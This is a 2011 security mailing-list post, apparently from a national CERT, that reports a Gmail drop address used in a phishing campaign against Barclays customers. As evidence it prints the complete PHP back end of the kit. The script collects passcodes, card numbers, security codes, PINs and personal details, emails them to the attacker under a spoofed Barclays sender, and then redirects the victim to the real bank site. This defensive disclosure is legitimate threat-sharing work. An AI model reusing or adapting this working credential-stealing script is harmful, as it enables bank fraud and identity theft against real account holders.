[nsp-sec] gmail phishing drop-box
Rodolfo Baader
rbaader at arcert.gov.ar
Mon Jun 13 16:07:04 EDT 2011
Hi!
while investigating a phishing case, we've found the following dropbox:
"s9800054 at gmail.com"
Evidence:
==============================================================================
<?
$to = "s9800054 at gmail.com";
//-----------------------------------
$surname = $_POST['surname'];
$membershipNo = $_POST['membershipNo'];
$passCode = $_POST['passCode'];
$memorableword = $_POST['memorableword'];
$FirstName = $_POST['FirstName'];
$Surname1 = $_POST['Surname1'];
$DD = $_POST['DD'];
$MM = $_POST['MM'];
$YYYY = $_POST['YYYY'];
$sortcode = $_POST['sortcode'];
$Accountnumber = $_POST['Accountnumber'];
$ElectroncardNo = $_POST['ElectroncardNo'];
$EXmm = $_POST['EXmm'];
$exYYYY = $_POST['exYYYY'];
$securitycode = $_POST['securitycode'];
$Hnn = $_POST['Hnn'];
$MMn = $_POST['MMn'];
$TelePin = $_POST['TelePin'];
$Postcode = $_POST['Postcode'];
$ip = $_SERVER['REMOTE_ADDR'];
$subj = "Barclay's Info";
$msg = "Surname : $surname\nMembership number : $membershipNo\nFive-digit
passcode : $passCode\nEnter Your memorable word : $memorableword\nFirst Name :
$FirstName\nSurname : $Surname1\nDate of Birth : $DD-$MM-$YYYY\nCurrent account
sort code : $sortcode\nCurrent account number : $Accountnumber\n16-digit
Connect/Electron card number : $ElectroncardNo\nExpire Date :
$EXmm-$exYYYY\nThree-digit security code : $securitycode\nHouse number or name :
$Hnn\nMaiden Name : $MMn\nTelephone banking Pin : $TelePin\nPost Code :
$Postcode\nip : $ip";
$from = "FROM: BraIn Inc.� '08<membership at barclays.co.uk>";
{mail($to,$subj,$msg,$from);}
header("location: http://www.barclays.co.uk/");
?>
==============================================================================
R.
More information about the nsp-security
mailing list